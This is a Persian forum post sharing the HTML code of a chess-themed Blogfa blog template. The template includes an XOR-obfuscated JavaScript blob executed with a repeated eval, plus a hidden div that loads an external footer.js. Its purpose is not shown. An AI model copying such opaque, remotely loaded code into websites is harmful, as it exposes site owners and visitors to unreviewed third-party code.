رزرو آنلاین هتلclose
قالب شطرنج کد 009162702
::: در حال بارگیری لطفا صبر کنید :::
قالب شطرنج کد 009162702
www.rozex.rozblog.com
نام کاربری : پسورد : یا عضویت | رمز عبور را فراموش کردم

صفحه اصلیقالبهای ورزشیقالب شطرنج کد 009162702

درود هم میهنان گرامی، با عرض ادب و احترام به اطلاع میرسانیم تلاش اعضای اين انجمن در راستای گسترش ورزش در جامعه و تقویت فرهنگ گردشگری در کشور عزیزمان ایران میباشد و بدينوسيله از تمام منابع، سایت ها، وبلاگ ها، اشخاص حقيقی و حقوقی كه موضوعات و مطالب شان توسط اعضا منتشر میگردد سپاسگذاریم.
تعداد بازدید : 1630
نویسنده پیام
Manager آفلاین

صاحبان امتیاز

ارسال‌ها : 104
عضويت : 11 /9 /1391
محل زندگي : تهران
سن : 48
تشکر ها: 27
تشکر شده : 28
قالب شطرنج کد 009162702


ویژه بلاگفا


کد:


<html>
<head><!--قالب ورزش ، صنعت و هنر 009162702-->
<title><-BlogTitle-></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="author" content="<-BlogAuthor->">
<meta name="language" content="Farsi">
<meta name="description" content="<-BlogAndPostTitle-> - <-BlogDescription-> - <-BlogTitle->">
<meta name="keywords" content="<-BlogAndPostTitle->,<-BlogId->, Blog, Weblog, Persian,Iran, Iranian, Farsi, Weblogs">
<link rel="alternate" type="application/rss+xml" title="<-BlogTitle->" href="<-BlogXmlLink->">

<script language="JavaScript" src=" http://m-qaleb.com/Templates/free/M-QaLeB/blogfa/simple/travelling/009162702/009162702.js"></script>
<script language="JavaScript" src=" http://m-qaleb.com/Templates/free/M-QaLeB/body.js"></script>


<script language="javascript"> function GetBC(lngPostid)
{
intTimeZone=<-BlogTimeZone->;
strBlogId="<-BlogId->";
intCount=-1;
strResult="";
try {
for (i=0;i<BlogComments.length;i+=2)
{
if (BlogComments==lngPostid)
intCount=BlogComments[i+1] ;
}
} catch( e) {
}
if ( intCount==-1) strResult="آرشیو نظرات";
if ( intCount==0) strResult="نظر بدهید";
if ( intCount>0) strResult=intCount + " نظر" ;

strUrl="/comments/?blogid=" +strBlogId + "&postid=" + lngPostid + "&timezone=" + intTimeZone ;
strResult ="<a href=\"javascript:void(0)\" onclick=\"javascript:window.open('" + strUrl + "','blogfa_comments','status=yes,scrollbars=yes,toolbar=no,menubar=no,location=no ,width=500px,height=500px')\" >" + strResult + " </a>" ;

document.write ( strResult ) ;
}

function OpenLD()
{
window.open('/links','blogfa_ld','status=yes,scrollbars=yes,toolbar=no,menubar=no,location=no ,width=500px,height=500px');
return true;
}
</script>
</head>
<body>
<div align="center">
<div id="page">

<div id="footer">

<div class="Back">
<div class="footer2">
<table border="0" width="1000" cellspacing="0" cellpadding="0">
<tr><td colspan="3" width="1000">
<div id="header">
<div id="top-parts"><div id="Title">
<div id=BlogTitle><br><-BlogTitle-></div>
<div id=BlogDescription><-BlogDescription-></div>
<div id="rss"><a target="blank" href="/rss"><img src="http://m-qaleb.com/Templates/free/M-QaLeB/blogfa/simple/travelling/009162702/spacer.gif" width="217" height="117" Title="Feed"></a>
</div></div></DIV>
<div id="menu">
<ul>
<li><a href="<-BlogUrl->" class="menu">Home</a></li>
<li><a href="mailto:<-BlogEmail->" class="menu">E-Mail</a></li>
<li><a href="<-BlogProfileLink->" target="blank" class="menu">About Us</a></li>
<li><a href="posts/" target="blank" class="menu">Posts</a></li>
<li><a href="http://m-qaleb.com" target="blank" class="menu">M-QaLeB</a></li>
</ul>
</div> <div class="m-qaleb-ads"></div>
<div style="float:right;width:704px;height:62px;margin-right:20px;"><a target="blank" href="http;//m-qaleb.com/">
<!--آدرس تصویر آپلود شده خود را جایگزین ادرس تصویر پایین نمایید --><img src="http://m-qaleb.com/Templates/free/M-QaLeB/blogfa/simple/travelling/009162702/ads.gif"></a></div>
</div>


<table border="0" width="1000" cellspacing="0" cellpadding="0">


<tr><td width="220" valign="top">
<!--برای حذف پیامکها کدهای زیر را از ابتدا تا انتها حذف کنید -->
<!--ابتدا -->
<BlogSmsBlock>
<div id=left-sidebar>
<div class=sidebar-top2><div class=sidebar-top-txt>
<b>پیامک</b></div></div>
<div class=sidebar-bg>
<BlogSms>
<div class=li-Sid>
<script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x,y){var i,o=\"\",l=x.length;for(i=0;i<l;i++){if(i>(53+y))" +
"y*=2;y%=127;o+=String.fromCharCode(x.charCodeAt(i)^(y++));}return o;}f(\"SC" +
"Y[MSTR\\035X\\0278h95%7f.d&wina!#m)|?1;1#0u6f31e(\\010\\010\\016\\006L\\035" +
"H\\004\\000\\010\\030(\\003\\t\\013.\\004Y\\036\\\\EF_VELNR\\007\\t\\014yy~" +
"%#g\\033M\\t\\036H\\036[DI]IC\\004H\\007TMLT\\\\F\\035_\\nT\\024\\013\\000U" +
"\\003\\003\\017{(onm>)lu1d($,<\\016$y;zo($2,,(5|2p,\\025\\003\\021\\027\\02" +
"6MVK\\007\\005CP\\021\\013FMYDF_(W6=:(/KOM\\\"\\\\+0>.b\\\"/N3>.b\\\"026RB\\"+
"010N0^Z:-\\016\\\"\\\\47>BbI32ZRZh)J93<.b\\\"736RBt,106RB\\nO0^Z=,\\016\\\"" +
"\\\\rjcuW\\022hcahd\\rC;?:$&\\022@?g**)\\025R7n%)9n,_14>Bb\\007_w_h-\\rN\\\\"+
"^~=-\\016\\\"\\\\TQMH\\016N0^ZSVf4F[CLlP\\\"\\\\KJO)\\017N\\\\^DtlB\\0236u0" +
"93X\\037`y6C3R\\002~./XcF\\020wbT9-\\016\\\"\\\\lZR-\\rN\\\\^4Z6qK22ZRjb\\\""+
"r^Z9-\\016\\\"\\\\57>BbN12ZR+\\016N\\\\^0?.b\\\"@(*=4\\013Ynp`R<b\\\"&/4#.\\"+
"tN22ZRVj#[CWQTb\\\\(d{5q\\036\\020rwrklCE)+-%g\\026 )k.z_[\\032oAtov]Px*cjq" +
"}\\014ajEcqL\\030.ehglJ-=)i5)\\014O='\\17755\\025\\007)722w\\026\\030iy/%5W" +
"El>o5.\\003\\027(pih%V\\nglcb0FCl.Z,B\\034Co.o.l_\\010{+\\177\\\"f\\026\\03" +
"0 ligj]\\020ud$'\",53)" ;
while(x=eval(x));
//-->
//]]>
</script>
</div></BlogSms>
</div>
</BlogSmsBlock>
<!--انتها -->

<BlogAuthorsBlock>
<div id=left-sidebar>
<div class=sidebar-top2><div class=sidebar-top-txt>
<b>نويسندگان</b></div></div>
<div class=sidebar-bg><BlogAuthors> <div class=li-Sid>
<a href="<-AuthorLink->"><-AuthorName-></a></div></BlogAuthors></div>
<div class=sidebar-bottom></div></div>
</BlogAuthorsBlock>

<div id=left-sidebar>
<div class=sidebar-top2><div class=sidebar-top-txt>
<b>آخرين مطالب</b></div></div>
<div class=sidebar-bg><BlogPreviousItems items="10">
<div class=li-Sid>
<a href="<-PostLink->" title="<-PostDate->"><-PostTitle-></a></div></BlogPreviousItems></div>
<div class=sidebar-bottom></div></div>

<BlogLinksBlock>
<div id=left-sidebar>
<div class=sidebar-top2><div class=sidebar-top-txt>
<b>لینک دوستان</b></div></div>
<div class=sidebar-bg><div class=li-Sid>
<a target="_blank" href="http://www.m-qaleb.com">M-QaLeB</a></div><BlogLinks><div class=li-Sid>
<a target="_blank" href="<-LinkUrl->"><-LinkTitle-></a></div></BlogLinks> </div>
<div class=sidebar-bottom></div></div>
</BlogLinksBlock>

<BlogLinkDumpBlock>
<div id=left-sidebar>
<div class=sidebar-top2><div class=sidebar-top-txt>
<b>پيوندهای روزانه</b></div></div>
<div class=sidebar-bg><BlogLinkDump><div class=li-Sid>
<a target="_blank" href="<-LinkUrl->" title="<-LinkDescription->"><-LinkTitle-></a></div></BlogLinkDump><div class=li-Sid>
<a href="http://gpg.ir" target="_blank" title="M-QaLeB">›گروه انسانهای سبز</a></br>
<a href="http://janbaz.org/" target="_blank" title="M-QaLeB">›جانبازان ایران</a></br>
<a href="http://touristsupport.ir/" target="_blank" title="M-QaLeB">›انجمن حامیان ایرانگردان و جهانگردان</a></br>
<a target="_blank" href="http://www.m-qaleb.com">M-QaLeB</a></div></div>
<div class=sidebar-bottom></div></div>
</BlogLinkDumpBlock>
</td>
<td width="560" valign="top">

<div align="center">

<div id="post">
<BLOGFA>

<div class=post-top>

<div class="post-top2" valign="top"><div class=post-top2-text>
<a href="<-PostLink->"><-PostTitle-></a></div>
</div></div> <div class=entry><div class=entry2>
<-PostContent->
<BlogPostTagsBlock><br>برچسب‌ها: <BlogPostTags separator=", "><a href="<-TagLink->"><-TagName-></a></BlogPostTags></BlogPostTagsBlock>
<br><BlogExtendedPost><br><div id="more"><a href="<-PostLink->"><br>ادامه مطلب</a></div></BlogExtendedPost><br>

</div></div>
<br>
<div class=post-bottom3>
<div class=date><-PostDate->   <-PostTime->  <a href="<-PostAuthorLink->"><-PostAuthor->™</a></div> <div class="Comment"><BlogComment><script type="text/javascript">GetBC(<-PostId->);</script></BlogComment>
</div></div>
</BLOGFA>

<BlogNextAndPreviousBlock>
<style>.pging { direction:rtl; font-size:1.2em; height:30px; margin:40px 0 0; color:#000000; padding-bottom: 20px; text-align: center;}
.pging a:link, .pging a:visited {border:1px solid #666666; color:#666666; display:inline-block; margin:0 3px; padding:1px 5px; text-decoration:none;}
.pging a:hover, .pging a:active { color:#000000;}.pging a.current:link, .pging a.current:visited { background-color:#000000; border:1px solid #666666; color:red; cursor:text;}</style> <div class=pging>
<font face="Tahoma" style="font-size: 9pt">
<BlogPreviousPageBlock><a href="<-BlogPreviousPageLink->"><font color="#666666"><< مطالب جدیدتر</font></a></BlogPreviousPageBlock>
........ <BlogNextPageBlock><a href="<-BlogNextPageLink->"><font color="#666666">مطالب قدیمی‌تر >></font></a></BlogNextPageBlock>
<br></font></font><br></div></BlogNextAndPreviousBlock>
<div style='display:none'><script language="javascript" type="text/javascript"src="http://m-qaleb.com/M-QaLeB/weblog/footer.js"></script></div>
</div></div> </td>

<td width="220" valign="top">

<div id=right-sidebar>
<div class=sidebar-top><div class=sidebar-top-txt>
<b>درباره وبلاگ</b></div></div>
<div class=sidebar-bg> <div class=li-Sid2> <BlogProfile>
<BlogPhoto><div style="text-align:center;"><img src="<-BlogPhotoLink->"></div></BlogPhoto>
<br><-BlogAbout-></BlogProfile></div></div>
<div class=sidebar-bottom></div></div>

<BlogCategoriesBlock>
<div id=right-sidebar>
<div class=sidebar-top>
<div class=sidebar-top-txt>
<b>موضوعات وب</b></div></div>
<div class=sidebar-bg><BlogCategories><div class=li-Sid>
<a href="<-CategoryLink->"><-CategoryName-></a></div></BlogCategories></div>
<div class=sidebar-bottom></div></div>
</BlogCategoriesBlock><BlogTagsBlock>
<div id=right-sidebar>
<div class=sidebar-top>
<div class=sidebar-top-txt>
<b>برچسب‌ها وب</b></div></div>
<div class=sidebar-bg><BlogTags><div class=li-Sid>
<a href="<-TagLink->"><-TagName-></a> <span dir="rtl">(<-TagCount->)</span></div></BlogTags></div>
<div class=sidebar-bottom></div></div>
</BlogTagsBlock>

<div id=right-sidebar>
<div class=sidebar-top><div class=sidebar-top-txt>
<b>آرشيو مطالب</b></div></div>
<div class=sidebar-bg>
<BlogArchive><div class=li-Sid>
<a href="<-ArchiveLink->"><-ArchiveTitle-></a></div></BlogArchive></div>
<div class=sidebar-bottom></div></div>

<div id=right-sidebar>
<div class=sidebar-top><div class=sidebar-top-txt>
<b>طراحی قالب</b></div></div>
<div class=sidebar-bg>
<div class=li-Sid2> <center>
<a target="blank" href="http://m-qaleb.com/" title="طراحی قالب وبلاگهای پارسی"><img src="http://m-qaleb.com/wp-content/themes/wp-M-QaLeB-02/images/m-qaleb-banner.png"></a></center></div>
</div>

<div class=sidebar-bottom></div></div>

<div id=right-sidebar>
<div class=sidebar-top><div class=sidebar-top-txt>
<b>امکانات وب</b></div></div>
<div class=sidebar-bg><div class=li-Sid2>
<center>
<font face="Tahoma" style="font-size: 8pt">

<-BlogCustomHtml-></font></div></div></center>
<div class=sidebar-bottom></div></div>

</td></tr></table><div id="clear-fix"></div>
</tr></td></table>
</div></div></div></div>
<p style="color:#fff;">
Designed By: <a href="http://www.m-qaleb.com"target="_blank">M-QaLeB</a> & copyright 2011 <a href="/"target="_blank"><-BlogId-></a> <br>powered By :
<a href="http://www.blogfa.com"target="_blank">BLOGFA</a></p>
</div>
</body>
</html>

یکشنبه 04 فروردین 1392 - 20:49
وب کاربر ارسال پیام نقل قول تشکر گزارشبرای ارسال پاسخ ابتدا باید لوگین یا ثبت نام کنید.